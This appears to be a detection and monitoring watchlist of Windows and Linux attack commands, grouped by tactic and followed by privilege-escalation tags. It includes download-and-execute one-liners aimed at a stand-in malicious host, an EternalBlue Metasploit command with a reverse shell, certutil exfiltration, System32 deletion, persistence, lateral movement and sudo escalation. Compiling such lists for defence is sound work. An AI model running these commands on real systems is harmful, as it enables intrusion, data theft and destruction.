#PowerShell commands that download or execute files from external sources, such as:

Invoke-WebRequest
Invoke-Shellcode
Invoke-Expression

#Commands that enable remote access or control, such as:

netsh advfirewall firewall remoteadmin enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start "Remote Desktop Services"

#Commands that disable or bypass security controls, such as:

setx /m PATH "%PATH%;C:\Malware"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

#Commands that perform credential harvesting or stealing, such as:

mimikatz
net user administrator *

#Commands that exfiltrate data, such as:

certutil -encode data.txt encoded_data.txt
ftp -s:upload.txt

#Commands that create or modify user accounts or groups, such as:

net user /add
net localgroup administrators /add

#Commands that modify or delete system files, such as:

del /f /s /q C:\Windows\System32\*
sfc /scannow /offbootdir=C:\ /offwindir=C:\Windows


#Commands that install or modify software or services, such as:

msiexec /i malicious_installer.msi /qn
sc create malicious_service binpath="C:\Malware\malicious_service.exe"

#Commands that enable or disable Windows features or components, such as:

dism /online /disable-feature /featurename:TelnetServer
dism /online /enable-feature /featurename:NetFx3 /all /source:D:\sources\sxs /limitaccess

#Commands that initiate network scanning or port scanning, such as:

nmap -sS -p 1-65535 10.10.10.10
ping -n 1 -w 500 10.10.10.10

#Commands that modify system settings or configurations, such as:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v Debugger /t REG_SZ /d "C:\Malware\malicious_debugger.exe" /f
netsh advfirewall firewall add rule name="MaliciousRule" dir=in action=block protocol=TCP localport=443

#Commands that execute scripts or macros, such as:

cscript.exe //B C:\Malware\malicious_script.vbs
powershell.exe -ExecutionPolicy Bypass -File C:\Malware\malicious_script.ps1

#Commands that establish or terminate network connections, such as:

netstat -ano
taskkill /pid <process_id> /f

#Commands that enumerate or dump system information, such as:

systeminfo
wmic bios get serialnumber

#Commands that modify or delete registry keys or values, such as:

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v MaliciousProgram /t REG_SZ /d "C:\Malware\malicious_program.exe"

#Commands that execute or schedule tasks, such as:

schtasks /create /tn "MaliciousTask" /tr C:\Malware\malicious_task.exe /sc ONCE /st 10:00
at 12:00 /every:monday,tuesday,wednesday,thursday,friday C:\Malware\malicious_task.exe

#Commands that encrypt or decrypt files or data, such as:

openssl enc -aes-256-cbc -in file.txt -out file.enc -k secret_password
certutil -decode encoded_data.txt decoded_data.txt

#Commands that execute or interact with browser-based applications, such as:

chromium-browser --disable-web-security --user-data-dir=/tmp/malicious_profile http://malicious_website.com
firefox -no-remote -P malicious_profile -url http://malicious_website.com

#Commands that modify or abuse Active Directory settings, such as:

net user /domain /add
dsadd user "CN=MaliciousUser,CN=Users,DC=domain,DC=com" -pwd Pass1234 -mustchpwd yes

#Commands that perform memory-based attacks, such as:

meterpreter > ps
meterpreter > migrate <process_id>

##top 10 examples of malicious commands that could be used in attacks and should be blocked or monitored in an organization:

#Commands that download and execute malicious code, such as:

curl http://malicious_website.com/malware.exe -o C:\Malware\malware.exe && C:\Malware\malware.exe
wget http://malicious_website.com/malware.exe -O C:\Malware\malware.exe && C:\Malware\malware.exe

#Commands that create or modify user accounts, such as:

net user /add
net localgroup administrators /add malicious_user

#Commands that modify file permissions or ownership, such as:

icacls C:\Windows\System32\malicious.dll /grant everyone:(F)
takeown /f C:\Windows\System32\malicious.dll && icacls C:\Windows\System32\malicious.dll /grant everyone:(F)

#Commands that launch or terminate processes, such as:

tasklist /svc
taskkill /im malicious_process.exe /f

#Commands that perform lateral movement, such as:

net use \\target_computer\IPC$ /user:username password
psexec.exe \\target_computer -u username -p password -accepteula -c C:\Malware\malicious_program.exe

#Commands that leverage PowerShell to execute malicious code, such as:

powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://malicious_website.com/malware.ps1')"

#Commands that manipulate or exfiltrate data, such as:

echo "sensitive_data" >> C:\Malware\exfiltrated_data.txt
certutil -urlcache -f http://malicious_website.com/exfiltrated_data.txt C:\Malware\exfiltrated_data.txt

#Commands that exploit or abuse system vulnerabilities, such as:

msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST <target_ip>; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <attacker_ip>; exploit"
nmap -sS -sV -O --script vuln <target_ip>

#Commands that inject or load malicious code into memory, such as:

rundll32.exe malicious.dll,DllRegisterServer
sc create MaliciousService binPath= "C:\Malware\malicious_service.exe" start= auto

#Commands that perform privilege escalation, such as:

runas /user:administrator C:\Malware\malicious_program.exe
sudo -u#-1 /bin/bash

ere's a complete list of the tags associated with privilege escalation that we have discussed so far:

sudo
sudoers
sudo hijacking
exploit
msfconsole
adenum
pass the hash
pass the ticket
mimikatz
netsh
runas
setuid
setgid
file permissions
DLL hijacking
cron jobs
user impersonation
kernel exploits
group policy
registry
DLL injection
Scheduled Tasks
Privilege Escalation Scripts
exploit-db
PowerShell
su





